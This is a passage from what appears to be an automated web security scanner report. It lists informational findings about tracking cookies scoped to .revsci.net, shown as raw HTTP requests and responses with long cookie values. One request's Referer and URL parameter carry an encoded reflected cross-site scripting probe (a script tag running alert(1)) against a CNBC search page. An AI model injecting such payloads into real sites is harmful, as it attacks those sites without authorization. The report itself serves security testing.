LDG0Ebdk97yPWXMHfs851lzhfLlaLKKihH8E0ttdfNitqM3z+jRRwNf/0nUkJDN0vVqi9DkSTYL3S1zJahw4jQxEgYLB+UM+nmJNELCQt8tIzGIsQs/5EAfzjXmzmArF/0Q6+iwvge1aUliti+sJlZJn/4/EeGs1fEBV6vjlA+ks2LPIQuFNVD1kcy7Xv4tzmiqIZBjbJnQ56GuTQFQ5WRhAEkDdWcrF5DG8jGq/jgeFK0SYP/iBuftGXZ+Zm8UKI/Rkz+uTtUGYRLjg3QXmdOrcZxDmoMqAWX5k3co+22bYZnJ4CTuYY7kqZpAeiggMrxP/yqqOJA8DRDP+tQPgZmQuX5x7SK2zc8YJvyIglmXnSjyQag4Y7dV8ktQ2xRFe+4tfE9uuRlygF/+i/DYnCU/oX7KVRZK1gH4t1X4DD6ujnE03D0dcVPq63lnB8fhT5abFumSIfdx+jwtpvZAOngIPfd9Obkd7s6ilkr1Avn8cJcl9yoH28n0tVe"; rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WDbVjIJteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFOWlzUMTmbjeI5py/GeW6vTj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/o5PxXjqVBdRDmufS+NYRr1Q+VnhvMCavKi8EDZe5QGsI+pkIh9yzH3rUTaGWWXQU0Ed6h3BIUCMlj2TArZOWXhnqVDhmJxfG1UR86XEiHrbbTnQKw+T6i+Wvf1e5Hg2E7p9yWQaV+9HWbZ0C78wJipEuzcz1yT+HlOtRu/EmYN9zeCWWaqwRlov0oxjsNeu2+lYr7BP/bxWFcXC1xKsPTtMbc8XnixKis2l+N3se7jHFkeQJh7tu1xdJ4Kjb8bCs31iSkOEOguNJRWKb9cIpJN1INL7RISSr9WRpfv5jHB77pTwG0VeGYQ5BY3jCjJ33HyFHevXZjzcY4RlI0EUapclJQm3k9fdWzdbNaG0riueE6NKA2RTHy2dC6z8wrqYdn7xOgfCW63/UTnO4l45BtmrY1KteHuYcz51soyILRWIiYVYTrR0E5k+41339fWkpMofXoGz0fnygCNr+iRy+/rLmSSJ/UUg2l+U9duzc/NMQ=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05S6hScUZY7jk9D/Y8sdnlHP/5/LhztKuWrz1dEPG5Xt07bn2X4Y1WNOeKX+gFaj+QEzDd7lDX0r6uuE6KEHUTV7VrJfYQc8j7ixrfHU9uQwGvbx7nRS9kOyODH0/l/KPGV9m3O2z1pYNIuFGQpkIZx0ZFXv/oUdXx1+hQFPbRtkGUDxXUi6CBi64g+YpZpA2k/FgE6FJQwneNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:17:16 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:17:15 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.123. http://pix04.revsci.net/I10985/b3/0/3/1008211/128597095.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/128597095.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkThwCImeVPvvjt7QnAcOPwWBY+yD5ZCC6vEFB9t1/cqtRkjylQljZ2RzJAkbWrRui4RxWmVp4bbzR7Izh3TZRoFmqM1aWr9ESPbI6B5njnomM9keCJJeZd7HKOaa3sQ56dXDRCl96t6bVXBkQI0c9KpvJ+jqzu2BGNmJfu3ZLzDoVWgROkpogdZn+UVZhuplunW41Y23J+N639Yk0FAXcAE73YN7Dql57uFUq6djlE801fgUQBozQLnN1pBn4BVzaKGaHjVCCN5847oFr/g/g1Uf6aBioz68wfdBVQtRaxp7mjRVALNK9LKeG1VvZoFg==; Domain=.revsci.net; Expires=Sat, 16-Jun-2012 10:10:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/128597095.js?D=DM_LOC%3Dhttp%253A%252F%252Fsearch.cnbc.com%252Fmain.do%253Ftarget%253Dall%2526keywords%253Dxss3a34b%25253C%252Fscript%25253E%25253Cscript%25253Ealert(1)%25253C%252Fscript%25253E7c5fa54ba36cca68%2526categories%253Dexclude%2526searchboxinput%253Dxss%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F8%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_qzhT="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9X53YJybh8eM9OR5om4StALLEl9sEMKpkMB7dKccfVs6uraSZZbpr04Xo6vz9NkCbeeozpW928CY/0OixkZQD7sCDZSgJR/jkpsLCifBQ10eEu+lspgfSYGHACY8nJhb5Y0x4NvT7ZkI45WLCJioFPvl31iPYU7ocv/wij7b0mY82aC0LmbMw6cBkACTH39tJzXhLOIuvvnXu3z5kEr9MW+T5y5TkWZ1+iyAi+GF4d8BhUReCDW+rpp5r7L79CJRIBiOQGbrxJlPcsQ98RcDgc1UMNhb5ldHB7NaLFc4O2DunntF0dCqdXyOtYuTjdnuVbak/+O6HZHxw+Z9lCxefStqwCauQa1u0yS8yeC/D0eKDJdbSrcABQxerMv8Fu7xs7O6DTxYxoo5eK816HiBeYbBeJrgRwEdOhgM8md3lIsJgsuEpA4NMXJKfMscBvfz0ZP3R7AShrjHd5BfCum1No/fbdEQlYxanPnmT5KY7xyUrwnsQZbslTdDhxpNhVi5/cAmrkjM5qOsTTK4me+Ai1qOduL+lenb7mea4gVYGkk1Ev0x7nFrmVE8ogZcLAJ7X+s6+umzWPJLTp9vqZei0fotYxr36iwCEvVaXaPlwTuxm+hNSa052jMC+6K856lB4HtaMNtcZwHR7Pe4bVugnwl+njf0YeB81+7ducHYAbyb7tIwzpJ3kntUiIUj6cy4BvOxK7y3GIKeCkuBaxhM3KgPkak3rUxjmU2Z40oKOdqiuVLsSKEVuk3Ik3e1Td8B/wB1vV1LuoTmdVART8DMnj73iJuEI/Vr1P1MGz6/RKsuakN1pOdpMAULKlukUM7bdTpZlEqjULDS/5ey1S+tjsZRe5lkhpREL5mDrYOqm0JXlsU4RW71BA81XmQ/tsxo18o8ce1SyzlRJFAEvXHcq4jQN+b1jqpbRV3fYwAjM6VYfhI29zTkA/BvRDf5z4cga+m1TcgdmuRe5FAXzHsKcMdenaJFcaevyAydGev1tV/y+tYxQ2nFPhHUYS4/IESm8oNCprBvoEA4vdWNzOPCqD9ygq9Untfei5hbl/b+KqPneB3TMTUpYWZzoLg5oIz1jae3N2YuT8M5YqZScAXqZoFa15dqpdUREBzGm09aGyaQJDR20VrGh3QTSBOs1UcONh+4+awIeVF5zFi7p3qLniYmUiNEv69UadjjvcqC9FhHQJ+mRPIfXrNrRp7mQtSfcxPhPWDKeMMEjR46kMaqzY3qKZ0a7Rcc2BtoTeuQQ7b7mn1byvyFDhfMwQKkpXYwRxg8GYr8OglQhfSSg4eOJhdD1iQevwFXmqNGOl2loSVaAl789X6qaWrg=="; rsi_us_1000000="pUMN4ymjOBYY7dWCY29D76LmRNLjJLwpN8BJPAYO6J28Imy0AJEZ/jMMNxsAxH1l4rtfjJktkns9VVJfA3En7seUYUVeUne94Yw1XMfGgwFoGMUppAXe+BRBa/Xe7ktYTFuyA0NhfAjhqJTumnKgJWRYN/V3dM2aRRSvNwkdH0f5ayxltHyLXk4nok2B/zDsAsKORDJbaQuSqO5/JrpDOV9Joa0/0iBX1kWsX1vDwaUqt/nrPP4KIh+nizkZCZL9Zt2FdN6o3MgSK/Ty7jRmyJ9b81dfutrNfMwdtaAJMR0w4lh2FrIdrxLPJojjra+XJAOO2gWg8toIdBbsChPLLcUyZT6NLaEqIh1b+9IVwc2rx/XVy5I/MLFnjtm0NePxxF9JAnQ0YxZO4VMan8jYb/p7yTn7a37IOvJxOtDTXYB0UKBsjRObFTLvM1kFc3Z0h8wYpB1gVkPuk8aGJUvqa8CrW9kBBddrV0UJ9VT/j4tma1JsGsWuCmhY5yJXrC32NOtXQDVurPGRwyKvwuPhsTMbP65K3SzGkdCpr67ZpvX3Lr6Y8kU4NFlF8FHIs9Q1KZTkITnk+fbb8Nsq+kfN4SbY12nLXecrMdiiw9SE0vsRO98IgLOOjoSG2HMEFv5fx6lQ7MxDIiphVuxOgcV/e2OlPFqB9PiDEu8Tv0FcLTIcFNJJl7hvu9f1KhMSkgjflebyWLoGBLoFsP2xShyYwFyyipYO1YbfqfnnfnrlYJiMMaZqvkp1SdfjwkcCQyP1GczCnmyKf9tTlhxuiHygEypIxgh3MCIq7QDxIj/BRQmy5N3Y0RgjziSvge5S9Gm4yDJqclEiYFU5+NytRni5w93YobLuqd2MaFTuOewPEwqKA459QFmknpsB7DHyKh6fNNMktXQ/OzDukHm7+M8tbx46E8b1xXMxMlHnLUO6sD+XUZeJQyjngR6yi1Qtz2JfhIDMBt9rTnvsFJmTFjR9rPEFG7t1zk6W9DI54ok8elpkMSyDdSPIxfGgWXKvvCy4VE/0+JptDEKlZctww1K/5mhqaNkWutOV4F9VlrR9Zws40T0W73q5gpLHKTwB+hPBfIzI6356H7lEgcOL2HWhq2MV4B5jyG57LBHIpF9NAW+bl1GtQH1Ht/wnXBF1iSU96XqdpV4gOz0hv249OjuWv9cq6uUvwByxjoyOs6fD11Mql0NGni/oPUP28MjaiJhZpvkP5tYXjhSMBoClGY4OqOwpn95hLAmgib5VRQ5iB1LcaJP44aYqw6FhsK39WvvLjgg+46tyRWfyloL0HLxVt/Vkwk/k1OoyEmqDOu+nYFkNqUigSiNlHaKTXgWtybiJHMbBPQstyAOfu2IMYgOHBK1t1BqzVu8Vn99lQjivX7+f+c9GLlsnpb3q/ZEP6yoGQ8YsvL4giRi6og0gjizND2A7ZN/fRTTubA8NVrgPRuPAnXa3s+yUf/su/nvqrmlE42ny1/3mV84gyXTCXNgisirK7I9BYpndWDEAUBMhjAJBO9pooFHGAW86bGMksCNL4//8oheQ9/DADyTxPisLPf01IiR9uIctOGJJ5ArUdzzDZsGFqO2+bYZnI4CTyeY7kqZpfeiggMrxP/yqqOJA8DRDP+tQPgZmRenBx7SKe3gYheMD+rjjm3kFFcZGEsdfxhID6NgMbPFqADzO560my3Q5aKhOh9lcoruDLVRZK94G4t1H5Dz6uknE03D0dcVPq6/lnB8fhT7ab1umQAXcw+jwtpvZAOngIDfd9Obrd5s6ilkr1Aun8cJcl9ygH23uVNIW"; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGJeR0y7qszCFSMPy1DTH1L1ZHjvQZq/ZUBU0KP7gq6Kmb/mOe295VguJlH1TW83cuTXCnr8SOCGmMmdNe6h175yxIjBb8Mzz+EdulvJish3UpAOYjx0sbDzE/DdcFBwAjTQbVdeid7P0ZSWlEh4DBz8ZSIsBQtyIIhSOP7byyJpLCrXVOprPkZ6Z2LaGx1ar6uvvfXos1Y4bGwiXzOEz0MQNLJUAZ52Q2cWjtmFe+Zr6mqja6lDLQSZuadJulAwL6WHmVZDAvAlEla/glRUyBL2+ufhADgmtrTIbBcM8tSNpifAHNhpw5PwYPffBz0FoI0Shh0kOn2LoPZG2jLNhoGA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkThwCImeVPvvjt7QnAcOPwWBY+yD5ZCC6vEFB9t1/cqtRkjylQljZ2RzJAkbWrRui4RxWmVp4bbzR7Izh3TZRoFmqM1aWr9ESPbI6B5njnomM9keCJJeZd7HKOaa3sQ56dXDRCl96t6bVXBkQI0c9KpvJ+jqzu2BGNmJfu3ZLzDoVWgROkpogdZn+UVZhuplunW41Y23J+N639Yk0FAXcAE73YN7Dql57uFUq6djlE801fgUQBozQLnN1pBn4BVzaKGaHjVCCN5847oFr/g/g1Uf6aBioz68wfdBVQtRaxp7mjRVALNK9LKeG1VvZoFg==; Domain=.revsci.net; Expires=Sat, 16-Jun-2012 10:10:59 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Fri, 17 Jun 2011 10:10:58 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.124. http://pix04.revsci.net/I10985/b3/0/3/1008211/149141737.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/149141737.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq3/uioEppzybAZxKwaQY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1yCXK3aX6BtHZFDnD6taOUzkZssC9SmHYB+KGGe5X1cNTJKECoUMZ4/wp7+XvOCqse5myjM47fJG9XyF3o2LcLH2JBctdDfkUpvsKp7h/8wrQqfNTmNrtJFgpskRYf+ovvy93QA4saI/5RCJ9S8KLVFBQ+BRLHzkbmX4zNmcoVxKjLhqBHgxD0FT5+Ln1KN2UyKNEy7XX5OrG9hyFdTjX30ylHdMWwEsYD/pKMRwVsoZWhFeqiNuc9cEqQSsRhxMU+2RP38baOVRIfW7/Btj8cBj5LlhrfD1Tn16oha4M5/ZotDYi5/qazTNFubn1Qt7A7EjnhWEqLIcLhI8s2+uLnXyw6x5d4nIsCtuBLdS6gErWZy3JVzYmv8h5NUyK70aIxzVqEJ31X7Jh5lt0ikrpLRZHqRm+gqnWlGok2BK90Q7cZj8HFd4Zr6+rib0GqKI2iHV1KH25wKH+p19498lf+VhpUrQ+FcB+ySMYhO2SGL9y8zm3D31ukc6uHMWlP0Ri5DxCYEj3aJUJsmrCjpLAPQLmN/9YMtoBA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:52:17 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/149141737.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
